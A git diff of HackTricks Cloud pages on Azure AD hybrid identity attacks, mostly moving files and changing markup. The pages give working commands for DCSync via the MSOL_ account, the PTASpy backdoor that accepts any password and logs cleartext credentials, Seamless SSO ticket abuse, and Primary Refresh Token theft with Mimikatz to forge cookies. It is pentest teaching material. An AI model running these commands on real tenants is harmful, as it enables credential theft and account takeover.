+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
similarity index 60%
rename from pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
rename to src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
index a509782eb..7c61e9337 100644
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
@@ -1,25 +1,12 @@
 # Az - PHS - Password Hash Sync
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
 [From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-phs) **Password hash synchronization** is one of the sign-in methods used to accomplish hybrid identity. **Azure AD Connect** synchronizes a hash, of the hash, of a user's password from an on-premises Active Directory instance to a cloud-based Azure AD instance.
 
-

+

 
 It's the **most common method** used by companies to synchronize an on-prem AD with Azure AD.
 
@@ -36,8 +23,8 @@ When an on-prem user wants to access an Azure resource, the **authentication tak
 
 When PHS is configured some **privileged accounts** are automatically **created**:
 
-* The account **`MSOL_`** is automatically created in on-prem AD. This account is given a **Directory Synchronization Accounts** role (see [documentation](https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#directory-synchronization-accounts-permissions)) which means that it has **replication (DCSync) permissions in the on-prem AD**.
-* An account **`Sync__installationID`** is created in Azure AD. This account can **reset password of ANY user** (synced or cloud only) in Azure AD.
+- The account **`MSOL_`** is automatically created in on-prem AD. This account is given a **Directory Synchronization Accounts** role (see [documentation](https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#directory-synchronization-accounts-permissions)) which means that it has **replication (DCSync) permissions in the on-prem AD**.
+- An account **`Sync__installationID`** is created in Azure AD. This account can **reset password of ANY user** (synced or cloud only) in Azure AD.
 
 Passwords of the two previous privileged accounts are **stored in a SQL server** on the server where **Azure AD Connect is installed.** Admins can extract the passwords of those privileged users in clear-text.\
 The database is located in `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf`.
@@ -73,9 +60,8 @@ runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
 Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'
 ```
 
-{% hint style="danger" %}
-You can also use [**adconnectdump**](https://github.com/dirkjanm/adconnectdump) to obtain these credentials.
-{% endhint %}
+> [!CAUTION]
+> You can also use [**adconnectdump**](https://github.com/dirkjanm/adconnectdump) to obtain these credentials.
 
 ### Abusing Sync\_\*
 
@@ -115,36 +101,22 @@ Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37"
 
 It's also possible to dump the password of this user.
 
-{% hint style="danger" %}
-Another option would be to **assign privileged permissions to a service principal**, which the **Sync** user has **permissions** to do, and then **access that service principal** as a way of privesc.
-{% endhint %}
+> [!CAUTION]
+> Another option would be to **assign privileged permissions to a service principal**, which the **Sync** user has **permissions** to do, and then **access that service principal** as a way of privesc.
 
 ### Seamless SSO
 
 It's possible to use Seamless SSO with PHS, which is vulnerable to other abuses. Check it in:
 
-{% content-ref url="seamless-sso.md" %}
-[seamless-sso.md](seamless-sso.md)
-{% endcontent-ref %}
+{{#ref}}
+seamless-sso.md
+{{#endref}}
 
 ## References
 
-* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs)
-* [https://aadinternals.com/post/on-prem\_admin/](https://aadinternals.com/post/on-prem_admin/)
-* [https://troopers.de/downloads/troopers19/TROOPERS19\_AD\_Im\_in\_your\_cloud.pdf](https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf)
-* [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8)
+- [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs)
+- [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/)
+- [https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf](https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf)
+- [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md
new file mode 100644
index 000000000..dcf4d820c
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md
@@ -0,0 +1,70 @@
+# Az - PTA - Pass-through Authentication
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-pta) Azure Active Directory (Azure AD) Pass-through Authentication allows your users to **sign in to both on-premises and cloud-based applications using the same passwords**. This feature provides your users a better experience - one less password to remember, and reduces IT helpdesk costs because your users are less likely to forget how to sign in. When users sign in using Azure AD, this feature **validates users' passwords directly against your on-premises Active Directory**.
+
+In PTA **identities** are **synchronized** but **passwords** **aren't** like in PHS.
+
+The authentication is validated in the on-prem AD and the communication with cloud is done by an **authentication agent** running in an **on-prem server** (it does't need to be on the on-prem DC).
+
+### Authentication flow
+
+

+
+1. To **login** the user is redirected to **Azure AD**, where he sends the **username** and **password**
+2. The **credentials** are **encrypted** and set in a **queue** in Azure AD
+3. The **on-prem authentication agent** gathers the **credentials** from the queue and **decrypts** them. This agent is called **"Pass-through authentication agent"** or **PTA agent.**
+4. The **agent** **validates** the creds against the **on-prem AD** and sends the **response** **back** to Azure AD which, if the response is positive, **completes the login** of the user.
+
+> [!WARNING]
+> If an attacker **compromises** the **PTA** he can **see** the all **credentials** from the queue (in **clear-text**).\
+> He can also **validate any credentials** to the AzureAD (similar attack to Skeleton key).
+
+### On-Prem -> cloud
+
+If you have **admin** access to the **Azure AD Connect server** with the **PTA** **agent** running, you can use the **AADInternals** module to **insert a backdoor** that will **validate ALL the passwords** introduced (so all passwords will be valid for authentication):
+
+```powershell
+Install-AADIntPTASpy
+```
+
+> [!NOTE]
+> If the **installation fails**, this is probably due to missing [Microsoft Visual C++ 2015 Redistributables](https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe).
+
+It's also possible to **see the clear-text passwords sent to PTA agent** using the following cmdlet on the machine where the previous backdoor was installed:
+
+```powershell
+Get-AADIntPTASpyLog -DecodePasswords
+```
+
+This backdoor will:
+
+- Create a hidden folder `C:\PTASpy`
+- Copy a `PTASpy.dll` to `C:\PTASpy`
+- Injects `PTASpy.dll` to `AzureADConnectAuthenticationAgentService` process
+
+> [!NOTE]
+> When the AzureADConnectAuthenticationAgent service is restarted, PTASpy is “unloaded” and must be re-installed.
+
+### Cloud -> On-Prem
+
+> [!CAUTION]
+> After getting **GA privileges** on the cloud, it's possible to **register a new PTA agent** by setting it on an **attacker controlled machine**. Once the agent is **setup**, we can **repeat** the **previous** steps to **authenticate using any password** and also, **get the passwords in clear-text.**
+
+### Seamless SSO
+
+It's possible to use Seamless SSO with PTA, which is vulnerable to other abuses. Check it in:
+
+{{#ref}}
+seamless-sso.md
+{{#endref}}
+
+## References
+
+- [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta)
+- [https://aadinternals.com/post/on-prem_admin/#pass-through-authentication](https://aadinternals.com/post/on-prem_admin/#pass-through-authentication)
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md
similarity index 61%
rename from pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md
rename to src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md
index 75a5557f0..a9039c850 100644
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md
@@ -1,25 +1,12 @@
 # Az - Seamless SSO
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
 [From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso) Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) automatically **signs users in when they are on their corporate devices** connected to your corporate network. When enabled, **users don't need to type in their passwords to sign in to Azure AD**, and usually, even type in their usernames. This feature provides your users easy access to your cloud-based applications without needing any additional on-premises components.
 
-
https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso-how-it-works

+
https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso-how-it-works

 
 Basically Azure AD Seamless SSO **signs users** in when they are **on a on-prem domain joined PC**.
 
@@ -74,47 +61,43 @@ To utilize the silver ticket, the following steps should be executed:
 
 1. **Initiate the Browser:** Mozilla Firefox should be launched.
 2. **Configure the Browser:**
-   * Navigate to **`about:config`**.
-   * Set the preference for [network.negotiate-auth.trusted-uris](https://github.com/mozilla/policy-templates/blob/master/README.md#authentication) to the specified [values](https://docs.microsoft.com/en-us/azure/active-directory/connect/active-directory-aadconnect-sso#ensuring-clients-sign-in-automatically):
-     * `https://aadg.windows.net.nsatc.net`
-     * `https://autologon.microsoftazuread-sso.com`
+   - Navigate to **`about:config`**.
+   - Set the preference for [network.negotiate-auth.trusted-uris](https://github.com/mozilla/policy-templates/blob/master/README.md#authentication) to the specified [values](https://docs.microsoft.com/en-us/azure/active-directory/connect/active-directory-aadconnect-sso#ensuring-clients-sign-in-automatically):
+     - `https://aadg.windows.net.nsatc.net`
+     - `https://autologon.microsoftazuread-sso.com`
 3. **Access the Web Application:**
-   * Visit a web application that is integrated with the organization's AAD domain. A common example is [Office 365](https://portal.office.com/).
+   - Visit a web application that is integrated with the organization's AAD domain. A common example is [Office 365](https://portal.office.com/).
 4. **Authentication Process:**
-   * At the logon screen, the username should be entered, leaving the password field blank.
-   * To proceed, press either TAB or ENTER.
+   - At the logon screen, the username should be entered, leaving the password field blank.
+   - To proceed, press either TAB or ENTER.
 
-{% hint style="success" %}
-This doesn't bypass MFA if enabled
-{% endhint %}
+> [!TIP]
+> This doesn't bypass MFA if enabled
 
 #### Option 2 without dcsync - SeamlessPass
 
 It's also possible to perform this attack **without a dcsync attack** to be more stealth as [explained in this blog post](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). For that you only need one of the following:
 
-* **A compromised user's TGT:** Even if you don't have one but the user was compromised,you can get one using fake TGT delegation trick implemented in many tools such as [Kekeo](https://x.com/gentilkiwi/status/998219775485661184) and [Rubeus](https://posts.specterops.io/rubeus-now-with-more-kekeo-6f57d91079b9).
-* **Golden Ticket**: If you have the KRBTGT key, you can create the TGT you need for the attacked user.
-* **A compromised user’s NTLM hash or AES key:** SeamlessPass will communicate with the domain controller with this information to generate the TGT
-* **AZUREADSSOACC$ account NTLM hash or AES key:** With this info and the user’s Security Identifier (SID) to attack it's possible to create a service ticket an authenticate with the cloud (as performed in the previous method).
+- **A compromised user's TGT:** Even if you don't have one but the user was compromised,you can get one using fake TGT delegation trick implemented in many tools such as [Kekeo](https://x.com/gentilkiwi/status/998219775485661184) and [Rubeus](https://posts.specterops.io/rubeus-now-with-more-kekeo-6f57d91079b9).
+- **Golden Ticket**: If you have the KRBTGT key, you can create the TGT you need for the attacked user.
+- **A compromised user’s NTLM hash or AES key:** SeamlessPass will communicate with the domain controller with this information to generate the TGT
+- **AZUREADSSOACC$ account NTLM hash or AES key:** With this info and the user’s Security Identifier (SID) to attack it's possible to create a service ticket an authenticate with the cloud (as performed in the previous method).
 
 Finally, with the TGT it's possible to use the tool [**SeamlessPass**](https://github.com/Malcrove/SeamlessPass) with:
 
-{% code overflow="wrap" %}
 ```
 seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt 
 ```
-{% endcode %}
 
 Further information to set Firefox to work with seamless SSO can be [**found in this blog post**](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/).
 
 #### ~~Creating Kerberos tickets for cloud-only users~~ 
 
-If the Active Directory administrators have access to Azure AD Connect, they can **set SID for any cloud-user**. This way Kerberos **tickets** can be **created also for cloud-only users**. The only requirement is that the SID is a proper [SID](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc778824\(v=ws.10\)).
+If the Active Directory administrators have access to Azure AD Connect, they can **set SID for any cloud-user**. This way Kerberos **tickets** can be **created also for cloud-only users**. The only requirement is that the SID is a proper [SID]().
 
-{% hint style="danger" %}
-Changing SID of cloud-only admin users is now **blocked by Microsoft**.\
-For info check [https://aadinternals.com/post/on-prem\_admin/](https://aadinternals.com/post/on-prem_admin/)
-{% endhint %}
+> [!CAUTION]
+> Changing SID of cloud-only admin users is now **blocked by Microsoft**.\
+> For info check [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/)
 
 ### On-prem -> Cloud via Resource Based Constrained Delegation 
 
@@ -126,22 +109,9 @@ python rbdel.py -u \\ -p   azureadssosvc$
 
 ## References
 
-* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso)
-* [https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
-* [https://aadinternals.com/post/on-prem\_admin/](https://aadinternals.com/post/on-prem_admin/)
-* [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory](https://www.youtube.com/watch?v=JEIR5oGCwdg)
+- [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso)
+- [https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
+- [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/)
+- [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory](https://www.youtube.com/watch?v=JEIR5oGCwdg)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md
similarity index 63%
rename from pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md
rename to src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md
index 4cef6beb1..28c96b512 100644
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md
@@ -1,25 +1,12 @@
 # Az - Pass the PRT
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## What is a PRT
 
-{% content-ref url="az-primary-refresh-token-prt.md" %}
-[az-primary-refresh-token-prt.md](az-primary-refresh-token-prt.md)
-{% endcontent-ref %}
+{{#ref}}
+az-primary-refresh-token-prt.md
+{{#endref}}
 
 ### Check if you have a PRT
 
@@ -29,11 +16,11 @@ Dsregcmd.exe /status
 
 In the SSO State section, you should see the **`AzureAdPrt`** set to **YES**.
 
-

+

 
 In the same output you can also see if the **device is joined to Azure** (in the field `AzureAdJoined`):
 
-

+

 
 ## PRT Cookie
 
@@ -61,7 +48,7 @@ The **KDF context is** a nonce from AzureAD and the PRT creating a **JWT** mixed
 
 Therefore, even if the PRT cannot be extracted because it's located inside the TPM, it's possible to abuseLSASS to **request derived keys from new contexts and use the generated keys to sign Cookies**.
 
-

+

 
 ## PRT Abuse Scenarios
 
@@ -109,11 +96,9 @@ Then you can use [**roadtoken**](https://github.com/dirkjanm/ROADtoken) to get a
 
 As oneliner:
 
-{% code overflow="wrap" %}
 ```powershell
 Invoke-Command - Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe - accepteula -s "cmd.exe" " /c C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"}
 ```
-{% endcode %}
 
 Then you can use the **generated cookie** to **generate tokens** to **login** using Azure AD **Graph** or Microsoft Graph:
 
@@ -180,9 +165,8 @@ HttpOnly: Set to True (checked)
 
 Then go to [https://portal.azure.com](https://portal.azure.com)
 
-{% hint style="danger" %}
-The rest should be the defaults. Make sure you can refresh the page and the cookie doesn’t disappear, if it does, you may have made a mistake and have to go through the process again. If it doesn’t, you should be good.
-{% endhint %}
+> [!CAUTION]
+> The rest should be the defaults. Make sure you can refresh the page and the cookie doesn’t disappear, if it does, you may have made a mistake and have to go through the process again. If it doesn’t, you should be good.
 
 ### Attack - Mimikatz
 
@@ -192,16 +176,14 @@ The rest should be the defaults. Make sure you can refresh the page and the cook
 2. The **Session Key is extracted next**. Given that this key is initially issued and then re-encrypted by the local device, it necessitates decryption using a DPAPI masterkey. Detailed information about DPAPI (Data Protection API) can be found in these resources: [HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) and for an understanding of its application, refer to [Pass-the-cookie attack](az-pass-the-cookie.md).
 3. Post decryption of the Session Key, the **derived key and context for the PRT are obtained**. These are crucial for the **creation of the PRT cookie**. Specifically, the derived key is employed for signing the JWT (JSON Web Token) that constitutes the cookie. A comprehensive explanation of this process has been provided by Dirk-jan, accessible [here](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/).
 
-{% hint style="danger" %}
-Note that if the PRT is inside the TPM and not inside `lsass` **mimikatz won't be able to extract it**.\
-However, it will be possible to g**et a key from a derive key from a context** from the TPM and use it to **sign a cookie (check option 3).**
-{% endhint %}
+> [!CAUTION]
+> Note that if the PRT is inside the TPM and not inside `lsass` **mimikatz won't be able to extract it**.\
+> However, it will be possible to g**et a key from a derive key from a context** from the TPM and use it to **sign a cookie (check option 3).**
 
 You can find an **in depth explanation of the performed process** to extract these details in here: [**https://dirkjanm.io/digging-further-into-the-primary-refresh-token/**](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/)
 
-{% hint style="warning" %}
-This won't exactly work post August 2021 fixes to get other users PRT tokens as only the user can get his PRT (a local admin cannot access other users PRTs), but can access his.
-{% endhint %}
+> [!WARNING]
+> This won't exactly work post August 2021 fixes to get other users PRT tokens as only the user can get his PRT (a local admin cannot access other users PRTs), but can access his.
 
 You can use **mimikatz** to extract the PRT:
 
@@ -217,16 +199,15 @@ Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'
 
 (Images from https://blog.netwrix.com/2023/05/13/pass-the-prt-overview)
 
-

+

 
 **Copy** the part labeled **Prt** and save it.\
 Extract also the session key (the **`KeyValue`** of the **`ProofOfPossesionKey`** field) which you can see highlighted below. This is encrypted and we will need to use our DPAPI masterkeys to decrypt it.
 
-

+

 
-{% hint style="info" %}
-If you don’t see any PRT data it could be that you **don’t have any PRTs** because your device isn’t Azure AD joined or it could be you are **running an old version** of Windows 10.
-{% endhint %}
+> [!NOTE]
+> If you don’t see any PRT data it could be that you **don’t have any PRTs** because your device isn’t Azure AD joined or it could be you are **running an old version** of Windows 10.
 
 To **decrypt** the session key you need to **elevate** your privileges to **SYSTEM** to run under the computer context to be able to use the **DPAPI masterkey to decrypt it**. You can use the following commands to do so:
 
@@ -235,27 +216,27 @@ token::elevate
 dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect
 ```
 
-

+

 
 #### Option 1 - Full Mimikatz
 
-* Now you want to copy both the Context value:
+- Now you want to copy both the Context value:
 
-

+

 
-* And the derived key value:
+- And the derived key value:
 
-

+

 
-* Finally you can use all this info to **generate PRT cookies**:
+- Finally you can use all this info to **generate PRT cookies**:
 
 ```bash
 Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT]
 ```
 
-

+

 
-* Go to [https://login.microsoftonline.com](https://login.microsoftonline.com), clear all cookies for login.microsoftonline.com and enter a new cookie.
+- Go to [https://login.microsoftonline.com](https://login.microsoftonline.com), clear all cookies for login.microsoftonline.com and enter a new cookie.
 
 ```
 Name: x-ms-RefreshTokenCredential
@@ -264,58 +245,40 @@ Path: /
 HttpOnly: Set to True (checked)
 ```
 
-* Then go to [https://portal.azure.com](https://portal.azure.com)
+- Then go to [https://portal.azure.com](https://portal.azure.com)
 
-{% hint style="danger" %}
-The rest should be the defaults. Make sure you can refresh the page and the cookie doesn’t disappear, if it does, you may have made a mistake and have to go through the process again. If it doesn’t, you should be good.
-{% endhint %}
+> [!CAUTION]
+> The rest should be the defaults. Make sure you can refresh the page and the cookie doesn’t disappear, if it does, you may have made a mistake and have to go through the process again. If it doesn’t, you should be good.
 
 #### Option 2 - roadrecon using PRT
 
-* Renew the PRT first, which will save it in `roadtx.prt`:
+- Renew the PRT first, which will save it in `roadtx.prt`:
 
-{% code overflow="wrap" %}
 ```bash
 roadtx prt -a renew --prt  --prt-sessionkey 
 ```
-{% endcode %}
 
-* Now we can **request tokens** using the interactive browser with `roadtx browserprtauth`. If we use the `roadtx describe` command, we see the access token includes an MFA claim because the PRT I used in this case also had an MFA claim.
+- Now we can **request tokens** using the interactive browser with `roadtx browserprtauth`. If we use the `roadtx describe` command, we see the access token includes an MFA claim because the PRT I used in this case also had an MFA claim.
 
 ```bash
 roadtx browserprtauth
 roadtx describe < .roadtools_auth
 ```
 
-

+

 
 #### Option 3 - roadrecon using derived keys
 
 Having the context and the derived key dumped by mimikatz, it's possible to use roadrecon to generate a new signed cookie with:
 
-{% code overflow="wrap" %}
 ```bash
 roadrecon auth --prt-cookie  --prt-context  --derives-key 
 ```
-{% endcode %}
 
 ## References
 
-* [https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/](https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/)
-* [https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/)
-* [https://www.youtube.com/watch?v=x609c-MUZ\_g](https://www.youtube.com/watch?v=x609c-MUZ_g)
+- [https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/](https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/)
+- [https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/)
+- [https://www.youtube.com/watch?v=x609c-MUZ_g](https://www.youtube.com/watch?v=x609c-MUZ_g)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md b/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md
new file mode 100644
index 000000000..6225d109c
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md
@@ -0,0 +1,7 @@
+# Az - Permissions for a Pentest
+
+{{#include ../../banners/hacktricks-training.md}}
+
+To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**.
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-persistence/README.md b/src/pentesting-cloud/azure-security/az-persistence/README.md
similarity index 53%
rename from pentesting-cloud/azure-security/az-persistence/README.md
rename to src/pentesting-cloud/azure-security/az-persistence/README.md
index 3e463b681..d686f7f78 100644
--- a/pentesting-cloud/azure-security/az-persistence/README.md
